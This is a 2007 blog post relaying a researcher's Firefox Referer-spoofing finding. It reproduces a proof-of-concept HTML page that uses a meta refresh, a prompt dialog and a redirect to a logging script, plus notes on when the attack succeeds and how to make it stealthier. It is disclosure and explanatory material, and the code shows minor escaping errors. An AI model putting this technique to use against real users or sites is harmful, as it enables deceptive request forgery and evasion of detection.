FREE THOUGHT · FREE SOFTWARE · FREE WORLD

Home  »  Javascript  »  Referer Spoofing Using JavaScript

by comment

Just read an interesting article on the awesome pseudo-flaw.net that you might enjoy. Even though at the moment I'm more into AJAX and simple behavioural unobtrusive javascript as opposed to java, I still remember how excited I was back in 1995 when Sun released both beta and alpha Java versions to the public.. In fact I still have my Java 1.0 Unleashed book, which I'm looking at right now.

Javascript is such a fun language to play with and experiment with, I just don't see the value in hacking javascript to do blackhat stuff.. I really don't see the value in doing any blackhat stuff for the simple reason that its not worth the risk. I really admire the hackers who freely give their time, energy, and expertise to improve the security of free software such as Mozilla Firefox.. it's fun to see what other people are discovering.. Check it.

pseudo-flaw.net


Proof Of Exploit Code

<html>
  <head><meta http-equiv="Refresh" content="1;url=http://www.askapache.com/">
  </head>
  <body>
    <script defer="1">
      setTimeout(function() {
      // from The Jungle Book, by Rudyard Kipling
      var text = "";
      text += "At the hole where he went inn";
      text += "Red-Eye called to Wrinkle-Skin.n";
      text += "Hear what little Red-Eye saith:n";
      text += ""Nag, come up and dance with death!"n";
      text += "n";
      text += "Eye to eye and head to head,n";
      text += "   (Keep the measure, Nag.)n";
      text += "This shall end when one is dead;n";
      text += "   (At thy pleasure, Nag.)n";
      text += "Turn for turn and twist for twist-n";
      text += "   (Run and hide thee, Nag.)n";
      text += "Hah!  The hooded Death has missed!n";
      text += "   (Woe betide thee, Nag!)n";
      prompt(text);
      var t=new image();
      t.src='http://topsites.blogflux.com/track_96716..gif';
      location="http://pseudo-flaw.net/firefox-referer-spoofing/log-request-info.cgi?title=Request+Info:+Quickly";
      }, 900);
      </script>
    </body>
</html>

Notes

  • Only the GET request method seems to be affected. There does not appear to be any mechanism to submit POST data.
  • If the user's browser is configured to not submit Referer information (e.g., network.http.sendRefererHeader=0), these attacks obviously do nothing.
  • The attack will fail if the user forcibly kills the browser, turns off her machine or severs her Internet connection before dismissing the dialog box.
  • The examples use dynamically generated iframe for demonstration purposes. These attacks work equally as well for static pages or top level content (e.g., sample using meta refresh [source]). Unfortunately, it is not as stealthy.
  • The meta refresh approach is most desirable, because the initial request is submitted without any referer information making the attack more difficult to detect.
  • These examples use intentionally goofy text. A real attack would use more appropriate text.
  • Invoking the "Joke Method" twice in a row crashes MineField/3.0a9pre.

Tags

November 27th, 2007

Comments Welcome

Popular Articles
My Online Tools

Related Articles
Newest Posts
Twitter



Hacking and Hackers

The use of "hacker" to mean "security breaker" is a confusion on the part of the mass media. We hackers refuse to recognize that meaning, and continue using the word to mean someone who loves to program, someone who enjoys playful cleverness, or the combination of the two. See my article, On Hacking.
-- Richard M. Stallman






[hide]

It's very simple - you read the protocol and write the code. -Bill Joy

Except where otherwise noted, content on this site is licensed under a Creative Commons Attribution 3.0 License, just credit with a link.
This site is not supported or endorsed by The Apache Software Foundation (ASF). All software and documentation produced by The ASF is licensed. "Apache" is a trademark of The ASF. NCSA HTTPd.
UNIX ® is a registered Trademark of The Open Group. POSIX ® is a registered Trademark of The IEEE.

| Google+ | askapache

Site Map | Contact Webmaster | License and Disclaimer | Terms of Service

↑ TOPMain